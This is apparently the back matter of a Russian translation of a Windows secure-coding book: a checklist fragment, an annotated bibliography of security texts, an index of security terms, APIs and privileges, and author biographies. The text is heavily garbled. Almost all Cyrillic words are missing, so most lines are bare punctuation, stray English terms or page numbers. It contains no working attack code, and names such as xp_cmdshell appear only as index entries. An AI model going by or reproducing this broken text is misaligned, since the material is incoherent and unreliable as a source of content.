, IsBadWritePtr !
CopyFile MoveFile ,
ACL. , CopyFile, ACL
, , ,
MoveFile, ACL. ,
; CLSCTX_REMOTE_SERVER.
,
,
,
.
!
?
!
, .
, ACL.
, .
.
, ,
.
,
.
!
exploit.
!
, !
, .
!
! ! ,
, ,
. ,
, , , . ,
!
(scripts)
RPC,
,
(script kiddies), .
.
, :
.
,
Perl,
, ! ,
!
.
, ,
,
, !
?
. :
, , !
, , .
, ,
. ,
.
. ,
, ,
, .
: ,
!
!
: ! , :
! :
. .
, , ,
, .
, exploit,
( ) .
,
, .
,
.
, .
,
, .
, .
, , .
:
. , ,
.
.
, . .
, , ,
!
: ,
.
: *.
,
: .
,
. ,
:
;
.
, , ,
.
, ,
.
,
.
, .
, .
, ACL
Windows NT/2000/XP
(ACL). , ACL
* 28 373
. . .
. ACL
.
ACL. ,
ACL , Everyone ().
, ( )
, ( ).
ACL Everyone ,
.
,
. Microsoft.
Web , ,
. ,
. ! ,
.
,
Web. .
,
HTTP 80, .
,
Web!
,
Web.
,
, SSL/TLS
HTTP. .
,
.
.
! ,
, , !
Boeing 747-400 ?
, ! , , ,
( , ), ,
. ? , .
, ,
, .
.
, ,
,
.
,
. ,
,
. .
, ,
. 45
, . 20
, ,
!
:
(open source).
, ,
, .
, ,
. ,
Microsoft: , .
,
, ! !
, ,
, :
. :
, ;
, ;
, ;
;
.
: , ,
,
. , ,
.
IIS 5, IIS 6
;
. , ,
, !
,
.
: ?
: !
: ?
: ,
.
: , , , ?
.
,
,
! .
. ,
.
. ,
.
,
. , , !
.
,
. .
, .
!
, ,
, . ...
,
. ,
, ,
.
,
. , .
, ,
, , .
,
, .
, !
exploit-
, ,
. :
30 , exploit,
10 .
, ,
,
. . ,
. ,
, ,
,
999 999 . :
,
, . , ,
.
, .
, ,
. , 99 100
,
. , ,
,
, ?
!
, .
, !
! . ,
, .
,
! ,
, : Notepad .
,
. .
,
, .
( Security Templates)
, ,
.
,
.
, BugTraq
NTBugtraq
3, 7
ActiveX,
16
.
,
23
. . .
23
23
22
23
24
, ,
. : , ,
, .
, ,
. , :
,
.
, ( Security
Templates) ,
, ,
.
RTC1
( Visual C++ .NET)
10
. . .
Strsafe.h
DACL
, DACL
(NULL)
Everyone ()
14
( PWLEN + 1,
, PWLEN
LMCons.h 256)
23
( ),
23
NTLM
SSPI ( Negotiate)
16
23
CreateProcess
NULL,
23
, ,
17
24
23
11
,
(, COM1, PRN, .)
11
23
HKLM
C:\Program Files
GENERIC_ALL,
IP,
0 INADDR_ANY
15
( ),
API
23
7, 23
23
Web
Web
13
SQL
12
SQL Server sa
12
ISAPI IIS 5
13
Web
13
eval
13
REFERER
13
23
RPC
IDL /robust
[range]
16
RPC
16
16
16
16
(NULL)
16
16
RPC
16
16
ActiveX,
,
16
SiteLock
16
( ,
DLL, , .)
memset ZeroMemory
. ,
, SecureZeroMemory
CryptoAPI
System.Security.Cryptography
RC4
,
RC4
( 128 ,
40)
FXCop
18
XML
18
, ,
18
, ,
18
18
RequestMinimum
18
RequestRefuse
18
RequestOptional
,
18
, ,
18
18
Assert RevertAssert
18
, ,
18
Assert
PermitOnly Deny. ,
18
LinkDemand .
18
18
SuppressUnmanagedCodeSecurityAttribute
18
18
( Security Templates)
,
.
,
.
19
SQL,
12, 19
2
SafeDllSearchMode Windows XP
Microsoft Windows .NET Server 2003
11
,
,
,
,
,
,
ActiveX,
, ,
16
.
,
23
,
:
.
, ,
, ,
. ,
.
,
.
, ,
, .
, ,
, .
,
.
,
. ,
, .
,
.
, .
, ,
, , ,
,
.
OSI (Open Systems Interconnection).
8. Friedl, Jeffrey E. F. Mastering Regular Expressions. 2d ed. Sebastopol, CA:
O'Reilly & Associates, 2002.
.
, Perl .NET Framework.
, ,
.
9. Garfinkel, Simson, and Gene Spafford. Practical UNIX & Internet Security.
2d ed. Sebastopol, CA: O'Reilly & Associates, 1996.
, ! ,
UNIX,
.
UNIX,
(Department of Defense),
Rainbow Series.
10. Garfinkel, Simson, and Gene Spafford. Web Security & Commerce. Sebastopol, CA: O'Reilly and Associates, 1997.
Web
.
11. Gollmann, Dieter. Computer Security. New York: Wiley, 1999.
, Fundamentals of Computer Security Technology. ,
, Microsoft Windows NT, UNIX
Web.
12. Grimes, Richard. Professional DCOM Programming. Birmingham, U.K.: Wrox
Press, 1997.
DCOM, , ,
.
13. Howard, Michael, et al. Designing Secure Web-Based Applications for Microsoft Windows 2000. Redmond, WA: Microsoft Press, 2000.
Web,
. , ,
Windows 2000 .
14. LaMacchia, Brian et al. .NET Framework Security. Reading, MA: Addison-Wesley, 2000. ,
. ,
.NET.
15. Lippert, Eric. Visual Basic .NET Code Security Handbook. Birmingham, UK:
Wrox Press, 2002. .NET.
, ,
.
16. Maguire, Steve. Writing Solid Code. Redmond, WA: Microsoft Press, 1993.
.
,
. ,
,
, ,
.
, , ,
,
.
17. McClure, Stuart, and Joel Scambray. Hacking Exposed: Windows 2000. Berkeley, CA: Osborne/McGraw-Hill, 2001. Windows 2000 ,
. Windows 2000 ,
Windows, .
, Windows 2000,
, .
18. McClure, Stuart, Joel Scambray, and George Kurtz. Hacking Exposed: Network Security Secrets and Solutions. 2nd ed. Berkeley, CA: Osborne/McGraw-Hill, 2000. , ,
, !
Netware, UNIX, Windows 95/98 Windows NT.
,
.
.
19. Menezes, Alfred J. et al. Handbook for Applied Cryptography. Boca Raton,
FL: CRC Press, 1997. ,
.
.
20. National Research Council. Trust in Cyberspace. Edited by Fred B. Schneider.
Washington, D.C.: National Academy Press, 1999.
,
,
, .
21. Online Law. Edited by Thomas J. Smedinghoff. Reading, MA: Addison-Wesley
Developers Press, 1996.
, ,
, , ,
, . ,
.
22. Ryan, Peter, and Steve Schneider. Modelling and Analysis of Security Protocols. London, England: Pearson Education Ltd, 2001.
, .
,
. ,
.
23. Schneier, Bruce. Applied Cryptography: Protocols, Algorithms, and Source
Code in C. 2d ed. New York: Wiley, 1996. ,
. , :)?
24. Security Protocols. Edited by Bruce Christianson, et al. Berlin: Springer, 1998.
,
. :
,
.
25. Shimomura, Tsutomu, and John Markoff. Takedown: The Pursuit and Capture of Kevin Mitnick, America's Most Wanted Computer Outlaw – By the Man Who Did It. New York: Hyperion, 1996.
,
Well, Sun Microsystems . ,
The Cuckoo's Egg, , , .
26. Solomon, David A., and Mark Russinovich. Inside Microsoft Windows 2000.
Redmond, WA: Microsoft Press, 2000.
Inside Windows NT.
, ,
,
. Windows NT 1993 .
SDK ()
.
( ,
, ,
), , ,
.*
27. Stallings, William. Practical Cryptography for Data Internetworks. Los
Alamitos, CA: IEEE Computer Society Press, 1996.
. ,
.
, , DES, IDEA,
SkipJack, RC5, , ,
, SNMP, .
28. Stallings, William. Cryptography and Network Security: Principles and
Practice. Englewood Cliffs, NJ: Prentice Hall, 1999.
,
, , S/MIME, SET, SSL/TLS, IPSec,
* : . ., Microsoft
Windows 2000. . .: ; .:
, 2001.
PGP Kerberos. ,
Applied Cryptography: Protocols, Algorithms, and Source Code in C,
.
29. Stevens, W. Richard. TCP/IP Illustrated, Volume 1: The Protocols. Reading,
MA: Addison Wesley, 1994. ,
IP. ,
. ,
.
30. Stoll, Clifford. The Cuckoo's Egg. London: Pan Macmillan, 1991.
, , ,
,
, .
.
31. Summers, Rita C. Secure Computing: Threats and Safeguards. New York:
McGraw-Hill, 1997. , ,
. ,
.
32. The Unicode Consortium. The Unicode Standard, Version 3.0. Reading, MA: Addison-Wesley, 2000. ( www.unicode.org.) , ,
, ! ,
, Unicode
.
33. Viega, John, and Gary McGraw. Building Secure Software. Reading, MA: Addison-Wesley, 2001. UNIX ,
. ,
UNIX, .
Windows.
!
34. Whittaker, James A. How to Break Software: A Practical Guide to Testing.
Reading, MA: Addison-Wesley, 2002.
. ,
, .
,
.
35. Zwicky, Elizabeth, et al. Building Internet Firewalls. 2d ed. Sebastopol, CA:
O'Reilly & Associates, 2000. ,
,
. , ,
. Windows
, .
3
3DES 243, 247
3DES (Triple-DES)
290
A
access control entry . ACE
Access Control List . ACL
ACE (access control entry) 98,147,
151, 153, 154, 155, 159, 160, 164,
166, 169, 180
ACK 398
ACL (Access Control List) 49, 97, 98,
147, 149, 150, 152, 153, 154, 155,
166, 170, 187, 188, 190, 262, 296,
317
ACE 164
ACE 164
155
Active Server Pages . ASP
Active Template Library . ATL
ActiveX 440, 441, 442, 443
activity diagram . ,
B
Back Orifice 179
Basic authentication
. ,
bind .
bit flip . ,
blanket . ,
.
bug .
C
C Runtime . CRT
canonicalization .
CAPICOM 242, 254
Cartesian join .
chokepoint .
Cipher 234
cloaking .
CLR (Common Language Runtime)
171, 254, 282, 463, 472
Code Access Security . CAS
code diffs . ,
code point .
COM (Component Object
Model) 411, 440
COM Internet Services
. COM
COM+ 172
combining character .
command shell .
connection point .
D
DACL (Discretionary Access Control
List) 147, 151, 158, 160, 169, 180,
398
167, 169
Damage potential . ,
Data Encryption Standard . DES,
. DES
data flow diagrams . DFD
data fork . ,
Data Protection API . DPAPI
DCE (Distributed Computing
Environment) 411
DCOM (Distributed COM) 99, 103,
257, 411, 432, 434, 435, 436
DDoS (distributed denial of service)
. , ,
dead code . ,
dead store elimination .
declarative permission
. ,
defacement . ,
Web
Denial of Service (DoS) . ,
DES (Data Encryption Standard) 23,
231, 243, 244, 247
DFD (data flow diagrams) 64, 75,
82, 83
DHTML (Dynamic HTML) 357
dictionary attack . ,
Digest authentication .
,
digest function . ,
Discoverability . ,
Discretionary Access Control List
. DACL
E
EFS (Encrypting File System) 99
Elevation of privilege . ,
Encrypting File System . EFS
ephemeral . ,
exception handler clobbering
. ,
Exploitability . ,
F
factoring . ,
FAT 290
fault tree .
FileMon 217
filtering .
fork .
FTP 154
FxCop 466
G
GAC (global assembly cache)
GNU C 279
469
H
hard link . ,
hash function . ,
Hash-Based Message Authentication
Code . HMAC
heap overflow . ,
HFS 323
HFS+ (Hierarchical File System
Plus) 314
HMAC (Hash-Based Message
Authentication Code) 250
honeypot .
HTML 58, 359, 363, 364
HTTP (Hypertext transfer
protocol) 5, 77, 154, 355, 371
HTTPS 96
Hypertext transfer protocol
. HTTP
I
I18N 378, 380
IAS (Internet Authentication
Service) 97
ICMP (Internet Control Message
Protocol) 462
ID 125
125, 391, 448
125
IDEA 243
IETF (Internet Engineering Task
Force) 99
IIS (Internet Information Services) 5,
95, 98, 132, 154, 173, 179, 317,
321, 324, 364, 485
IMAP (Internet Message Access
Protocol) 94
imperative permission
. ,
impersonation .
index out of range . ,
Information disclosure
. ,
J
JavaScript 58
JIT 477
JScript 242, 329
K
Kerberos 23, 92, 95, 419, 420
keyed hash .
L
LAN Manager 54
LDAP 94, 97
linear congruential function
. ,
M
MAC (message authentication code)
92, 99, 100, 249, 253, 374
mailslot .
malware .
man-in-the-middle . ,
marshalling .
maximum segment lifetime . MSL
message authentication code
. MAC
MFC (Microsoft Foundation
Classes) 140
Microsoft Interface Definition
Language . MIDL
Microsoft JScript 152
Microsoft Transaction Server 435
Microsoft Visual Basic Scripting
Edition . VBScript
MIDL (Microsoft Interface Definition
Language) 416
MS-DOS 314
MSL (maximum segment
lifetime) 399
mutex .
N
named pipe . ,
Napster 313
National Language Support . NLS
Negotiate 95
NetBIOS 97, 322, 460
NLS (National Language
Support) 378
NT LAN Manager . NTLM
NTFS 317
NTLM (NT LAN Manager) 93, 95, 96,
419, 420
NULL DACL . DACL,
O
OBJREF (object reference)
.
off-by-one error . ,
ONC (Open Network
Computing) 411
P
parameterized command
.
Password-Based Key Derivation
Function #1 . PBKDF1
patch .
PBKDF1 (Password-Based Key
Derivation Function #1) 261
PGP (Pretty Good Privacy) 103
Ping of Death . , ping
plug-in .
pointer subterfuge . ,
poisoning .
POP3 (Post Office Protocol 3) 94
port scanning .
promiscuous mode . ,
protocol sequences
.
Public-Key Cryptography
Standard . PKCS #5
Q
QoS (quality of service)
.
R
RADIUS (Remote Administration Dial
In User Service) 93, 97
RC4 243
register attack . ,
Regmon 217
regression bug .
Repudiation . ,
resource fork . ,
restricted token . ,
reverse engineering .
Rivest-Shamir-Adleman . RSA
RPC (Remote Procedure Call) 48, 99,
103, 257, 411, 412, 413, 415, 416,
421, 424, 428, 429
48
461
412
RPC endpoint mapping service
. RPC,
RPC runtime . RPC,
S
S/MIME (Secure/Multipurpose
Internet Mail Extensions) 103
SACL (System Access Control List)
151, 158, 160, 267
safe for initialization (SFI) . ,
,
salt .
SAM (Security Account Manager)
318, 339
Schannel 95
SCM (Service Control Manager) 187
script .
SDDL (Security Descriptor Definition
Language) 159–162
Secure Sockets Layer . SSL
Secure/Multipurpose Internet Mail
Extensions . S/MIME
SecureIIS 321
Security Account Manager . SAM
Security Configuration Editor
.
security descriptor .
Streams 317
strict handle .
,
Strings 234
strong named assembly .
SubSeven 179
superuser .
surrogate pair .
symbolic link (symlink) . ,
SYN flood .
SYN
System Access Control List . SACL
system entropy .
T
Tampering with data . ,
TCB (Trusted Computing Base) 185
TCP (Transmission Control
Protocol) 10, 390, 391, 404
TCP/IP 54, 99, 390
Terminal Server .
threat model . ,
threat target .
threat tree . ,
throttling .
TLS (Transport Layer Security) 57,
94, 95, 96, 99, 102, 257, 355, 375,
390
token .
Transact-SQL 349
Transmission Control Protocol
. TCP
Transport Layer Security . TLS
truncation error . ,
Trusted Computing Base . TCB
trustworthy computing .
U
UDP 390, 391, 408, 462
UDP bomb . , UDP
UID (User ID) 125
UML (Unified Modeling
Language) 64, 153
UNC (Universal Naming
Convention) 319
Unicode 130, 132, 304, 327, 374,
377, 378, 380, 386, 387
Unified Modeling Language . UML
Universal Naming Convention
. UNC
unsigned short . ID,
UPN (user principal name) 339
usability . ,
USB 472
User ID . UID
user principal name . UPN
UTF-8 325, 326, 378
UTF-16 378
UTF-32 378
V
VBScript (Microsoft Visual Basic
Scripting Edition) 152, 231, 309,
329
VTable hijacking . ,
VTable
W
waterfall approach .
,
Web 355
Web-based Distributed Authoring and
Versioning . WebDAV
WebDAV (Web-based Distributed
Authoring and Versioning) 320
window station .
X
XML 481
XOR 242, 243, 244, 290
XSLT (XSL Transformation) 485
XSS (cross-site scripting) . ,
Z
zero-day attack
. ,
92, 97
. RSA
74
DoS 417
DS (Denial of Service) 186
JScript 369
ping 448
UDP 447
259
SQL 344
144
328
VTable 144
144
294,
298, 355, 359, 360, 368, 480
328
144
258
89
45, 72, 92,
447
72
248
144
144
398
185
391
239, 357,
371
54, 96
144
178
232
477
Web
178
353
353
100, 169
261
92, 93, 417
IPSec 93, 94, 97
Kerberos 94
Kerberos v5 93, 96
Microsoft Passport 93, 94, 95
NTLM 93, 94, 96
.
ACE
58
. CAS
3
227
361
55
Microsoft Visual C++ 7 . CRT
226
405
74, 80, 179, 314, 321, 323,
362, 366, 412
323
323
323
178
FunLove 179
ILoveYou 179
W32.Bolzano 179
186
178
223
. GAC
85
483
79
74
487
156,
158, 168, 169
278
64
. DFD
. LSA
. SCM
6
192
100
55
. ID
. SID
202
. UID
. AppID
. DACL, . DACL
441
COM 193
ICommandWithParameters 349
IDispatch 441
IDisposable 290
IHttpModule 94
IObjectSafety 444
IPersist 441
ISecurityExample 438
ISerializable 483
IUnknown 441
UsbFileStream 472
398
HttpRequestValidationException
367
PolicyException 470
SecurityException 476
BadStringBuf 122
CAtlRegExp 310
CcryptRandom 228
CCryptRandom 228
CString 140
DataProtection 286
ErasableData 288
FileIOPermission 474
FileStream 485
FormsAuthenticationModule 94
PassportAuthenticationModule 95
Password 290
PrincipalPermission 171
RNGCryptoServiceProvider 230
SecurityPermission 474
SqlCommand 349
string 140
System.IO.File 476
UserInput 310
479
222, 250
3DES 235
DSA 236
RSA 235
235
235
235
100, 235, 237
235
236
239
100, 235
235
237
235, 237
231
234
223, 261
237
235
237
. MAC
441
441
36
44
479
277
283
36
37
288, 463
HTML 328
325
378
348
110
. NLS
139
434
92
99
(
) 296
. CSP
222
258
111, 118
. SAM
. MSL
186, 187, 188, 197, 214
199
187, 199, 201,
203, 464
222
414
154, 170
438
IClientSecurity::SetBlanket 439
IDispatch::Invoke 440
InheritanceDemand 480
Init 311
IsCallerInRole 172
IUnknown::AddRef 433
LinkDemand 476, 477
MyWin32Funtion 478
PermitOnly 476
Print 442
Release 433
Server.HTMLEncode 362
SetKey 480
Validate 311
. RPC
21
21
247, 259, 261
151, 170
437
439
83
. CLR
document.cookie 357
FileSystemObject 152
IAccessControl 437
IServerSecurity 439
PrincipalPermission 171
RegExp 309
SqlConnection 352
Utilities 230
71, 74, 78, 84, 85, 86
440
101
435
214
74
DoS 72
DREAD 79, 81, 90
STRIDE 71, 81, 101
73, 74, 77, 79, 81, 87, 88,
89
84, 85, 86
79, 92, 102
61, 78, 90
60
72, 92, 258
DNS 72
78
72, 92
73, 92
DNS 72
71,
92, 258
72,
75, 92
258
90
78
79
msize 141
sizeof 141
415, 425
426
422
236
. UPN
. SPN,
. SPN
357
Unicode 132
125
116
123
79
125
10
16
SYN 404
108, 112, 125, 132, 372,
378
118
109
357
(detached)
254
414, 431
67
244
131, 313, 321, 329
97, 98, 101, 180, 187,
197
Bypass Traverse Checking 206
SeAssignPrimaryTokenPrivilege
185, 187, 193, 210, 213
SeAuditPrivilege 213
SeBackupPrivilege 181, 184, 192,
213
SeChangeNotifyPrivilege 186, 203,
211, 214
SeCreatePagefilePrivilege 210, 213
SeCreatePermanentPrivilege 210,
213
SeCreateTokenPrivilege 213
SeDebugPrivilege 184, 193, 210,
213, 258
SeEnableDelegationPrivilege 214
SeImpersonatePrivilege 214
SeIncreaseBasePriorityPrivilege
210, 213
SeIncreaseQuotaPrivilege 185,
193, 210, 213
SeIncreasQuotaPrivilege 187
SeLoadDriverPrivilege 185, 210,
213
SeLockMemoryPrivilege 193, 210,
213
SeMachineAccountPrivilege 193,
213
SeManageVolumePrivilege 210
SeProfileSingleProcessPrivilege 210,
213
SeRemoteShutdownPrivilege 186,
192, 214
SeRestorePrivilege 184, 213
SeSecurityPrivilege 192, 193, 210,
213
SeShutdownPrivilege 192, 210, 213
SeSyncAgentPrivilege 214
SeSystemEnvironmentPrivilege
210, 213
SeSystemProfilePrivilege 213
71
64
20
4
RegularExpressions 301
System.EnterpriseServices 287, 288
System.Net 376
System.Runtime.InteropServices
283
System.Runtime.Serialization 487
System.Security.Cryptography 243,
463
System.Security.Cryptography.X509
Certificates 254
System.Text.RegularExpressions
308, 352
System.Xml.Xsl 485
. HTTP
. IPP
470
470
EmailAlertPermission 473, 474
EnvironmentPermission 480
FileIOPermission 470, 471, 473,
485
PasswordPermission 477
PrivateKeyPermission 480
ReflectionPermission 476
RequestMinimum 470
SerializationFormatter 487
SocketPermission 474
UnmanagedCode 474
471
471
97, 98
304, 308,
309, 310, 330, 331, 370
162
(
) 75, 76
93
78, 84, 85, 86
80
80
,
80
79
80
79
89
170, 171, 172, 173
469
287, 467
481
document.cookie 364
innerHTML 364
innerText 362, 363
location.href 360
location.search 360
SecurityPermissionFlag.Assertion
473
155, 166
483, 487
75
348
11
. SACL
5
96
Application_OnPreSendRequest
Headers 365
onactivate 359
onclick 363
onload 359
onmouseover 359
189, 390
380
. AL
314
438
314
cookie 278
11, 125
380
4, 10
51
440
170, 174
( )
179
178,
278
. RPC
166
. UNC
180, 188
308
125
93, 171,
180
92, 100
accept 400
AddAccessAllowedACE 166
AddAccessAllowedAceEx 166
AddAccessAllowedACEEx 166
AddAccessAllowedObjectAce 166
AllocateUserPhysicalPages 193,
281
BadFunc 121
bind 391
BroadcastSystemMessage[Ex] 192
close 398
CloseFileByID 427
closesocket 401
CoInitializeSecurity 435, 437, 438
GetUserNameEx 340
GetVersionEx 210
GetVolumeInformation 152
HandleInput_Strncpy2 137
HeapAlloc 276
HeapCreate 276
HeapSize 276
HttpRequest.Cookies 367
HttpRequest.Form 367
HttpRequest.QueryString 367
ImpersonateLoggedOnUser 203
inet_ntoa 140
InitializeCriticalSection 459
InitiateSystemShutdown[Ex] 192
IsBadExtension 299
IsNLSDefinedString 380, 381
IsTokenRestricted 205
LCMapString 379, 381
LogonUser 95, 185, 192
LsaLookupSids 412
LsaRetrievePrivateData 189, 264,
268
LsaStorePrivateData 189, 264, 268
lstrcat 133
lstrcpy 133
lstrcpyn 133, 135
main 117, 121, 455
malloc 111, 169
Message 420
MultiByteToWideChar 131, 336,
378, 381, 382
NetJoinDomain 193
NetLocalGroupDel 193
NetUserAdd 193
OpenEventLog 192
OpenFileByID 427
OpenIDFile 427
OpenProcessToken 197
PostMessage 192
PrinterOperations 425
printf 111
PrintMessage 128
PrivilegeCheck 200
quotename 349
rand 223
ReadFileByID 427
ReadProcessMemory 193
RegisterLogonProcess 192
RegQueryValueEx 148, 150
RevertToSelf 200
RpcBindingInqAuthClient 419, 420
92
249, 250
99
346
sp_executesql 350
sp_GetName 346
utl_file 348
xp_cmdshell 348
259
253
92, 99
243
244
243, 244
243
. EFS
225
37
. UML
. SDDL
320
,
Secure Windows Initiative, ,
,
,
.
Microsoft.
. , ,
Microsoft, , .
, ,
Security Strategies Microsoft,
Microsoft.
Microsoft.
Microsoft ,
Windows NT
Internet Scanner Internet Security
System. 1998 .
. ,
, ,
, ,
.
, , , , ,
, , .
,
.